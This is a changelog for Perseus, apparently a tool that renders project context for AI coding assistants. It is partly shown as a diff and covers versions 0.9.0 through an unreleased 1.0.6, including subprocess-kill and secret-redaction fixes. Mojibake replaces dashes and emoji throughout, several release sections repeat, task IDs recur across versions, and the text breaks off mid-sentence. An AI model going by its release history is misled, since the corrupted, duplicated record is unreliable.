  13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session,
  agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs.

**Distribution:**

- **task-80** — MCP Registry listing published live (`server.json`) — 13 tools, PyPI transport.
- **task-81** — Anthropic Skills marketplace listing (`SKILL.md`) — ready for PR to `anthropics/skills`.
- `pyproject.toml` version bumped to 1.0.3.

**Show HN preparation:**

- **task-82** — Swarm demo script — 120 agents, 4 batches, 51 frames of parallel multi-agent coordination.
- **task-83** — Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section.
- **task-84** — Show HN post draft.
- **task-85** — Cyberpunk v2 landing page deployed to perseus.observer.

**CI, docs, and tooling:**

- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12.
- `.coveragerc` — 70% coverage threshold.
- 596 tests passing, 1 skipped.

## [1.0.2] — 2026-05-23

**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):**

- **task-63** — Fixed `Path.write_text` missing encoding on Windows — emoji (📌) crash in default prompts.
- **task-64** — Fixed `/bin/bash` unreachable on native Windows Python — added `_get_shell()` helper
  using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`.
- **task-65** — Fixed `@query` binary stdout NoneType crash — guarded `result.stdout` with `or ""`.
- **task-66** — Fixed `perseus --help` crash on Windows (Mnēmē macron `ē` can't encode to `cp1252`) —
  added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time.

**New features:**

- **task-67** — **`render.max_query_bytes`** (default 256 KB) — caps runaway `@query` stdout with a
  visible truncation marker. Prevents 12 MB scanner output from silently inflating
  context documents (47× output reduction demonstrated).
- **task-68** — **Configurable `@query` timeout** — `render.query_timeout_s` (default 30s) and per-directive
  `timeout=N` modifier (e.g. `@query "..." timeout=120`).
- **task-69** — **`render.parallel_services`** (opt-in, default off) — concurrent `@services` health checks
  via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel.
- **task-70** — **`render.parallel_queries`** (opt-in, default off) — pre-scans top-level `@query` directives
  and resolves them concurrently. Directives inside `@if` branches remain sequential.

**Integrations:**

- **task-71** — **VS Code / Cursor extension** — auto-renders on `.perseus/context.md` save, status bar
  indicator, auto-detects target assistant file, watch mode.
- **task-72** — **Claude Code session hook** — one `curl` install, runs `perseus render` before every
  Claude Code session.
- **task-73** — **GitHub Action** — renders context on push/schedule, commits back to repo so every
  developer gets pre-resolved context without installing Perseus locally.
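
As a rough illustration of the `render.max_query_bytes` cap (task-67) combined with the `or ""` guard (task-65) listed above, the following sketch truncates captured output at a byte budget. The helper name `cap_output` and the marker text are assumptions made for this example; the actual marker Perseus emits is not specified in this changelog.

```python
def cap_output(stdout, max_bytes=256 * 1024):
    """Cap text at max_bytes of UTF-8 and append a visible truncation marker."""
    text = stdout or ""  # tolerate stdout=None, e.g. when nothing was captured
    data = text.encode("utf-8")
    if len(data) <= max_bytes:
        return text
    # errors="ignore" drops a multi-byte character that the cut split in half.
    kept = data[:max_bytes].decode("utf-8", errors="ignore")
    omitted = len(data) - max_bytes
    # Hypothetical marker format, chosen only for this sketch.
    return f"{kept}\n[output truncated: {omitted} bytes omitted]"


print(cap_output("abcdefghij", max_bytes=4))
```

Cutting on bytes rather than characters keeps the cap predictable for non-ASCII output, at the cost of possibly dropping one partial character at the boundary.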

**Multi-agent coordination:**

- **task-74** — **Shared checkpoint store** — agents across machines/sessions share a single checkpoint
  store (config: `checkpoints.store` path, accessible via NFS/SMB/unison).
- **task-75** — **Lock file mechanism** — `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint
  store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing
  gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem).
- **task-76** — **Checkpoint recovery** — `perseus recover --from ` reads the latest checkpoint
  and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly
  where to resume.

**Benchmarks:**

- Extreme scaling sweep on Linux: 10 → 10,000 `@query` directives, 4 modes each
  (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at
  ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25× vs 13.1s cold).
- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses,
  machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs.
- Efficiency infographic on README showing cold→warm scaling curve and 40× warm speedup.

**CI, docs, and tooling:**

- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12.
- Added `.coveragerc` — 70% coverage threshold.
- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules).
- Updated demo GIF with 6-scene cold→warm walkthrough.
- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact.
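
The lock file mechanism from task-75 above can be sketched along these lines. This is a simplified illustration, not the shipped code: `acquire_lock`, `release_lock`, the lock file name, and the backoff schedule are all hypothetical, and the delays are far shorter than the roughly 11 seconds mentioned in the entry.

```python
import os
import tempfile
import time


def acquire_lock(lock_path, attempts=6, base_delay_s=0.01):
    """Try to create lock_path exclusively, retrying with exponential backoff."""
    for attempt in range(attempts):
        try:
            # O_CREAT | O_EXCL raises FileExistsError if the file already exists.
            fd = os.open(lock_path, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
        except FileExistsError:
            time.sleep(base_delay_s * (2 ** attempt))
            continue
        with os.fdopen(fd, "w") as handle:
            handle.write(str(os.getpid()))  # record the owner for debugging
        return True
    return False  # the caller decides how to fail gracefully


def release_lock(lock_path):
    """Remove the lock file; a missing file is not treated as an error."""
    try:
        os.remove(lock_path)
    except FileNotFoundError:
        pass


lock = os.path.join(tempfile.mkdtemp(), "checkpoint.lock")
print(acquire_lock(lock))              # first writer wins
print(acquire_lock(lock, attempts=2))  # second writer gives up after retries
release_lock(lock)
```

Because creation and the existence check happen in a single `open` call, two writers cannot both believe they created the file; a stale lock left by a crashed writer would still need separate handling, which this sketch omits.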

## [1.0.1] — 2026-05-21

Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`).
No code changes; all 496 tests pass.

- **task-62** (follow-up) — post-release doc and metadata fixes: corrected PyPI author
  field, updated test-count references across README/docs/index.md to reflect live count
  (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable.

## [1.0.0] — 2026-05-20

All Phase 1–22 tasks complete. Perseus v1.0.0 — the first stable release.

- **task-56** — Phase 20C: added headless watch mode (`perseus watch`) — inotify/polling
  file watcher with configurable interval, re-render on change, and debounce. Degrades
  gracefully when watchdog is unavailable.
- **task-57** — Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/`
  covering render, synthesis, and Pythia output shapes; deterministic comparison harness
  in `tests/test_golden.py`.
- **task-58** — Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`)
  with per-command cold/warm timing, advisory warnings at 2× budget, and configurable
  thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the
  current environment — not failures.
- **task-59** — Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`)
  covering checkpoint round-trip compatibility, config migration (`oracle:` → `pythia:` rename),
  pack manifest version handling, and install/upgrade smoke paths.
- **task-60** — Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md`
  (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with
  single-file constraint, directive authoring 4-touch pattern, test conventions, Agora
  workflow). Updated README with `## Documentation` section.
- **task-61** — Phase 22B: added `examples/` with three runnable demo workspaces:
  `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/`
  (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker
  mount and auth guide). Smoke scripts verified end-to-end.
- **task-62** — Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped
  TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP
  docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented.

## [1.0.0-rc.1] — 2026-05-20

Release candidate — superseded by v1.0.0.

- **task-63** — Completed the Oracle → Pythia internal rename while preserving the
  public `perseus oracle` CLI compatibility surface. Added legacy `oracle:`
  config warnings and one-time `oracle_log.jsonl` → `pythia_log.jsonl`
  migration.
- **task-49** — Phase 18B: added `tests/test_release.py` (16 tests) covering all
  release artifact acceptance criteria — version coherence, repeatability,
  SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents.
- **task-50** — Phase 18C: aligned scheduler behavior and docs around
  host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and
  explicitly deferred native Windows Task Scheduler support.
  Added scheduler
  smoke tests and repaired release artifact portability on macOS/BSD tar.
- **task-51** — Phase 19A: added offline adapter conformance fixtures and a
  parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor,
  and Rovo Dev render outputs, pack manifests, and integration docs.
- **task-52** — Phase 19B: promoted product profiles into a documented gallery
  with output paths, trust defaults, refresh guidance, non-interactive generation
  tests, and hardcoded-path guards for all six supported profiles.
- **task-53** — Phase 19C: polished the VSCode extension for release with
  reproducible packaging docs, package scripts, LSP render/checkpoint/mutation
  smoke tests, and static package-manifest checks.
- **task-54** — Phase 20A: added optional bearer-token authentication for
  `perseus serve`, a token generator, non-loopback bind safety gates, trust
  report serve fields, and HTTP auth tests.
- **task-55** — Phase 20B: added a single-file-runtime container image,
  compose examples for render and authenticated serve, container trust docs,
  and static/optional Docker smoke tests.
- **task-56** — Phase 20C: added `perseus watch`, a dependency-free polling
  loop for refreshing single source files or context-pack render targets, with
  deterministic debounce tests and clean shutdown behavior.

## [0.9.0] — 2026-05-19

### Trust, privacy, and local policy (Phase 17)

- **task-45** — Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0.
- **task-46** — Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report.
- **task-47** — Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted.

### Distribution (Phase 18)

- **task-48** — Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall.
- **task-49** — Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG).

### Verification

- Tests: 393 passing, 0 skipped.
- Single-file runtime: `perseus.py` (`pyyaml` only).

## [0.8.x and earlier]

Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`.

# Changelog

All notable changes to Perseus.

This project follows the alpha-then-semver convention:
during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes
that are documented in the release notes.

Each entry maps a release to the task IDs that shipped in it. The
single-file `perseus.py` runtime is the only required artifact; everything
else (installer, docs) is generated by `scripts/release.sh`.

## [1.0.6] — UNRELEASED

Critical security + correctness hotfix bundle.
See GitHub milestone
[v1.0.6](https://github.com/tcconnally/perseus/milestone/1).

### 🐛 Bug Fixes

- **#139** — MCP `_call_tool` timeout actually kills the subprocess tree
  and no longer blocks on executor shutdown. Pre-1.0.6 had two coupled
  bugs:
  1. `future.result(timeout=…)` only abandoned the future — the worker
     thread (and any subprocess it had spawned) kept running, leaking
     CPU + side effects.
  2. The wrapper was a `with concurrent.futures.ThreadPoolExecutor(...)`
     block, so `executor.shutdown(wait=True)` ran on exit — blocking the
     MCP response until the abandoned worker finished. A 5s timeout on
     `sleep 600` blocked the MCP response for ~600s.

  Fix:
  - `_call_tool()` now uses a non-context-managed executor and calls
    `shutdown(wait=False, cancel_futures=True)` in a `finally` block.
    Response returns within ~timeout seconds, not ~sleep seconds.
  - `directives/query.py::resolve_query` now launches its subprocess
    with `start_new_session=True` (POSIX) so the child gets its own
    process group, and registers the popen handle in a module-level
    thread-keyed dict.
  - On timeout, `_call_tool` looks up the worker thread's subprocess
    and calls a new `kill_active_subprocess_for_thread(tid)`, which
    calls `os.killpg(pgid, SIGTERM)` (then `SIGKILL` if needed) on POSIX,
    or runs `taskkill /F /T /PID` on Windows. The entire subprocess tree
    is taken down atomically.
  - Timeout response surfaces the kill with a `" (subprocess killed)"`
    suffix so operators can see the kill actually fired.
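
The process-group kill described for #139 can be illustrated with a small POSIX-only sketch. It is a simplification under stated assumptions: `run_with_tree_kill` is a hypothetical helper, the one-second grace period is arbitrary, and the thread-keyed registry and the Windows `taskkill` path are not reproduced.

```python
import os
import signal
import subprocess


def run_with_tree_kill(argv, timeout_s, grace_s=1.0):
    """Run argv; on timeout, kill its whole process group (POSIX only).

    Returns a (stdout_text, killed) tuple.
    """
    proc = subprocess.Popen(
        argv,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
        start_new_session=True,  # child becomes leader of a new process group
    )
    try:
        out, _ = proc.communicate(timeout=timeout_s)
        return out, False
    except subprocess.TimeoutExpired:
        pgid = os.getpgid(proc.pid)
        os.killpg(pgid, signal.SIGTERM)  # polite request to the whole group
        try:
            out, _ = proc.communicate(timeout=grace_s)
        except subprocess.TimeoutExpired:
            os.killpg(pgid, signal.SIGKILL)  # escalate if SIGTERM was ignored
            out, _ = proc.communicate()
        return out, True


output, killed = run_with_tree_kill(["sh", "-c", "sleep 30"], timeout_s=0.2)
print("killed:", killed)
```

Signalling the group rather than the single PID is what reaches grandchildren such as a `sleep` started by the shell; killing only the shell could leave them running.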
+738|739| +739|740|### πŸ”’ Security (other v1.0.6 items, tracked in milestone) +740|741|- #136 β€” `long_hex_secret` redaction rule corrupted git hashes (PR #159) +741|742|- #137 β€” `@query` audit log leaked secrets (PR #160) +742|743|- #138, #140, #141, #142 +743|744| +744|745|### πŸ› Bug Fixes (other v1.0.6 items) +745|746|- #128 β€” MnΔ“mΔ“ narrative MD5β†’SHA-256 migration (PR #161) +746|747|- #131 β€” `memory compact` wall-clock deadline (PR #162) +747|748|- #129, #130, #135 +748|749| +749|750|### πŸ“¦ Migration Notes +750|751|- No config breaking changes. Behavior under timeout is strictly safer. +751|752| +752|753|--- +753|754| +754|755|## [1.0.5] β€” 2026-05-26 +755|756| +756|757|**Bastra-Recall β€” Persistent Memory Backend (superseded by MnΔ“mΔ“ v2 in 1.0.6):** +757|758| +758|759|> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a +759|760|> subsequent release and replaced by the native MnΔ“mΔ“ v2 SQLite FTS5 backend +760|761|> (`@mneme` directive). The `@memory` directive now routes exclusively through +761|762|> MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. +762|763| +763|764|- **task-86** β€” `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed β€” use `@mneme` instead.)* +764|765|- **task-87** β€” `_bastra_recall()` HTTP client *(Removed.)* +765|766|- **task-88** β€” `@memory` backend routing *(Removed β€” unified under MnΔ“mΔ“ v2.)* +766|767|- **task-89** β€” `memory.backend` and `bastra_url` config keys *(Removed.)* +767|768|- **task-90** β€” 20 new tests *(Removed with the feature.)* +768|769| +769|770|## [1.0.4] β€” 2026-05-25 +770|771| +771|772|**Phase 24 β€” Extensibility Architecture (Hephaestus):** +772|773| +773|774|- **task-65** β€” Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal. +774|775|- **task-66** β€” Directive macros: `@macro name ... 
@endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop. +775|776|- **task-67** β€” Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks. +776|777|- **task-68** β€” Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output. +777|778|- **task-69** β€” Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation. +778|779|- **task-70** β€” Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator. +779|780|- **task-71** β€” Pipe syntax: lightweight chaining β€” `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1. +780|781|- **task-72** β€” Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection. +781|782|- **task-73** β€” Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps. +782|783|- **task-74** β€” Directive aliasing: config-driven shorthand β€” `@qβ†’@query`, `@svcβ†’@services`. Single-pass expansion, built-ins always win collisions. +783|784| +784|785|**Phase 25 β€” MCP Deep Integration:** +785|786| +786|787|- **task-75** β€” Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`. 
+787|788| +788|789|## [1.0.3] β€” 2026-05-24 +789|790| +790|791|**Phase 24 β€” Assistant format targets, hook installer, MCP server (~840 lines):** +791|792| +792|793|- **task-77** β€” Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions` +793|794| renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves +794|795| default output paths. Each file gets a "Generated by Perseus" header pointing back to the source. +795|796|- **task-78** β€” Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit +796|797| hooks into `.claude/settings.json` for automatic context injection at session start and on every +797|798| prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks. +798|799|- **task-79** β€” MCP server faΓ§ade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing +799|800| 13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session, +800|801| agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs. +801|802| +802|803|**Distribution:** +803|804| +804|805|- **task-80** β€” MCP Registry listing published live (`server.json`) β€” 13 tools, PyPI transport. +805|806|- **task-81** β€” Anthropic Skills marketplace listing (`SKILL.md`) β€” ready for PR to `anthropics/skills`. +806|807|- `pyproject.toml` version bumped to 1.0.3. +807|808| +808|809|**Show HN preparation:** +809|810| +810|811|- **task-82** β€” Swarm demo script β€” 120 agents, 4 batches, 51 frames of parallel multi-agent coordination. +811|812|- **task-83** β€” Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section. +812|813|- **task-84** β€” Show HN post draft. +813|814|- **task-85** β€” Cyberpunk v2 landing page deployed to perseus.observer. 
+814|815| +815|816|**CI, docs, and tooling:** +816|817| +817|818|- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +818|819|- `.coveragerc` β€” 70% coverage threshold. +819|820|- 596 tests passing, 1 skipped. +820|821| +821|822|## [1.0.2] β€” 2026-05-23 +822|823| +823|824|**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):** +824|825| +825|826|- **task-63** β€” Fixed `Path.write_text` missing encoding on Windows β€” emoji (πŸ“Œ) crash in default prompts. +826|827|- **task-64** β€” Fixed `/bin/bash` unreachable on native Windows Python β€” added `_get_shell()` helper +827|828| using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`. +828|829|- **task-65** β€” Fixed `@query` binary stdout NoneType crash β€” guarded `result.stdout` with `or ""`. +829|830|- **task-66** β€” Fixed `perseus --help` crash on Windows (MnΔ“mΔ“ macron `Δ“` can't encode to `cp1252`) β€” +830|831| added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time. +831|832| +832|833|**New features:** +833|834| +834|835|- **task-67** β€” **`render.max_query_bytes`** (default 256 KB) β€” caps runaway `@query` stdout with a +835|836| visible truncation marker. Prevents 12 MB scanner output from silently inflating +836|837| context documents (47Γ— output reduction demonstrated). +837|838|- **task-68** β€” **Configurable `@query` timeout** β€” `render.query_timeout_s` (default 30s) and per-directive +838|839| `timeout=N` modifier (e.g. `@query "..." timeout=120`). +839|840|- **task-69** β€” **`render.parallel_services`** (opt-in, default off) β€” concurrent `@services` health checks +840|841| via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel. +841|842|- **task-70** β€” **`render.parallel_queries`** (opt-in, default off) β€” pre-scans top-level `@query` directives +842|843| and resolves them concurrently. Directives inside `@if` branches remain sequential. 
+843|844| +844|845|**Integrations:** +845|846| +846|847|- **task-71** β€” **VS Code / Cursor extension** β€” auto-renders on `.perseus/context.md` save, status bar +847|848| indicator, auto-detects target assistant file, watch mode. +848|849|- **task-72** β€” **Claude Code session hook** β€” one `curl` install, runs `perseus render` before every +849|850| Claude Code session. +850|851|- **task-73** β€” **GitHub Action** β€” renders context on push/schedule, commits back to repo so every +851|852| developer gets pre-resolved context without installing Perseus locally. +852|853| +853|854|**Multi-agent coordination:** +854|855| +855|856|- **task-74** β€” **Shared checkpoint store** β€” agents across machines/sessions share a single checkpoint +856|857| store (config: `checkpoints.store` path, accessible via NFS/SMB/unison). +857|858|- **task-75** β€” **Lock file mechanism** β€” `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint +858|859| store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing +859|860| gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem). +860|861|- **task-76** β€” **Checkpoint recovery** β€” `perseus recover --from ` reads the latest checkpoint +861|862| and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly +862|863| where to resume. +863|864| +864|865|**Benchmarks:** +865|866| +866|867|- Extreme scaling sweep on Linux: 10 β†’ 10,000 `@query` directives, 4 modes each +867|868| (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at +868|869| ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25Γ— vs 13.1s cold). +869|870|- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses, +870|871| machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs. +871|872|- Efficiency infographic on README showing coldβ†’warm scaling curve and 40Γ— warm speedup. 
+872|873| +873|874|**CI, docs, and tooling:** +874|875| +875|876|- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +876|877|- Added `.coveragerc` β€” 70% coverage threshold. +877|878|- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules). +878|879|- Updated demo GIF with 6-scene coldβ†’warm walkthrough. +879|880|- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact. +880|881| +881|882|## [1.0.1] β€” 2026-05-21 +882|883| +883|884|Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`). +884|885|No code changes; all 496 tests pass. +885|886| +886|887|- **task-62** (follow-up) β€” post-release doc and metadata fixes: corrected PyPI author +887|888| field, updated test-count references across README/docs/index.md to reflect live count +888|889| (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable. +889|890| +890|891|## [1.0.0] β€” 2026-05-20 +891|892| +892|893|All Phase 1–22 tasks complete. Perseus v1.0.0 β€” the first stable release. +893|894| +894|895|- **task-56** β€” Phase 20C: added headless watch mode (`perseus watch`) β€” inotify/polling +895|896| file watcher with configurable interval, re-render on change, and debounce. Degrades +896|897| gracefully when watchdog is unavailable. +897|898|- **task-57** β€” Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/` +898|899| covering render, synthesis, and Pythia output shapes; deterministic comparison harness +899|900| in `tests/test_golden.py`. +900|901|- **task-58** β€” Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`) +901|902| with per-command cold/warm timing, advisory warnings at 2Γ— budget, and configurable +902|903| thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the +903|904| current environment β€” not failures. 
+- **task-59** — Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`)
+  covering checkpoint round-trip compatibility, config migration (`oracle:` → `pythia:` rename),
+  pack manifest version handling, and install/upgrade smoke paths.
+- **task-60** — Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md`
+  (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with
+  single-file constraint, directive authoring 4-touch pattern, test conventions, Agora
+  workflow). Updated README with `## Documentation` section.
+- **task-61** — Phase 22B: added `examples/` with three runnable demo workspaces:
+  `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/`
+  (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker
+  mount and auth guide). Smoke scripts verified end-to-end.
+- **task-62** — Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped
+  TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP
+  docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented.
+
+## [1.0.0-rc.1] — 2026-05-20
+
+Release candidate — superseded by v1.0.0.
+
+- **task-63** — Completed the Oracle → Pythia internal rename while preserving the
+  public `perseus oracle` CLI compatibility surface. Added legacy `oracle:`
+  config warnings and one-time `oracle_log.jsonl` → `pythia_log.jsonl`
+  migration.
+- **task-49** — Phase 18B: added `tests/test_release.py` (16 tests) covering all
+  release artifact acceptance criteria — version coherence, repeatability,
+  SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents.
+- **task-50** — Phase 18C: aligned scheduler behavior and docs around
+  host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and
+  explicitly deferred native Windows Task Scheduler support. Added scheduler
+  smoke tests and repaired release artifact portability on macOS/BSD tar.
+- **task-51** — Phase 19A: added offline adapter conformance fixtures and a
+  parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor,
+  and Rovo Dev render outputs, pack manifests, and integration docs.
+- **task-52** — Phase 19B: promoted product profiles into a documented gallery
+  with output paths, trust defaults, refresh guidance, non-interactive generation
+  tests, and hardcoded-path guards for all six supported profiles.
+- **task-53** — Phase 19C: polished the VSCode extension for release with
+  reproducible packaging docs, package scripts, LSP render/checkpoint/mutation
+  smoke tests, and static package-manifest checks.
+- **task-54** — Phase 20A: added optional bearer-token authentication for
+  `perseus serve`, a token generator, non-loopback bind safety gates, trust
+  report serve fields, and HTTP auth tests.
+- **task-55** — Phase 20B: added a single-file-runtime container image,
+  compose examples for render and authenticated serve, container trust docs,
+  and static/optional Docker smoke tests.
+- **task-56** — Phase 20C: added `perseus watch`, a dependency-free polling
+  loop for refreshing single source files or context-pack render targets, with
+  deterministic debounce tests and clean shutdown behavior.
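
The `perseus watch` entry (task-56) mentions a dependency-free polling loop with debounce. One way such a loop could be structured is sketched below; `DebouncedPoller` and `watch` are hypothetical names, and the debounce rule (fire once the modification time has stayed unchanged for `debounce_s`) is an assumption rather than the documented behavior.

```python
import os
import time
from typing import Callable, Optional


class DebouncedPoller:
    """Hypothetical helper: report a change once it has been stable for debounce_s."""

    def __init__(self, debounce_s: float) -> None:
        self.debounce_s = debounce_s
        self._last_mtime: Optional[float] = None
        self._changed_at: Optional[float] = None

    def observe(self, mtime: float, now: float) -> bool:
        if self._last_mtime is None:
            self._last_mtime = mtime  # first observation is the baseline
            return False
        if mtime != self._last_mtime:
            self._last_mtime = mtime  # change seen; restart the debounce clock
            self._changed_at = now
            return False
        if self._changed_at is not None and now - self._changed_at >= self.debounce_s:
            self._changed_at = None  # fire once per burst of changes
            return True
        return False


def watch(path: str, on_change: Callable[[], None],
          interval_s: float = 1.0, debounce_s: float = 0.5) -> None:
    """Poll path's mtime and call on_change after each debounced change."""
    poller = DebouncedPoller(debounce_s)
    try:
        while True:
            if poller.observe(os.stat(path).st_mtime, time.monotonic()):
                on_change()
            time.sleep(interval_s)
    except KeyboardInterrupt:
        pass  # clean shutdown on Ctrl-C
```

Keeping the debounce decision in a class that takes `mtime` and `now` as arguments makes it testable without sleeping, which is one plausible route to deterministic debounce tests.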
+
+## [0.9.0] — 2026-05-19
+
+### Trust, privacy, and local policy (Phase 17)
+
+- **task-45** — Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0.
+- **task-46** — Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report.
+- **task-47** — Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted.
+
+### Distribution (Phase 18)
+
+- **task-48** — Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall.
+- **task-49** — Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG).
+
+### Verification
+
+- Tests: 393 passing, 0 skipped.
+- Single-file runtime: `perseus.py` (`pyyaml` only).
+
+## [0.8.x and earlier]
+
+Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`.
+
+# Changelog
+
+All notable changes to Perseus.
+
+This project follows the alpha-then-semver convention:
+during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes
+that are documented in the release notes.
+
+Each entry maps a release to the task IDs that shipped in it. The
+single-file `perseus.py` runtime is the only required artifact; everything
+else (installer, docs) is generated by `scripts/release.sh`.
+
+## [1.0.6] — UNRELEASED
+
+Critical security + correctness hotfix bundle. See GitHub milestone
+[v1.0.6](https://github.com/tcconnally/perseus/milestone/1).
+
+### 🔒 Security
+
+- **#137** — `@query` audit log no longer leaks secrets. Pre-1.0.6, calls
+  like `@query "curl -H 'Authorization: Bearer *** rendered correctly
+  redacted output but persisted the raw bearer token to
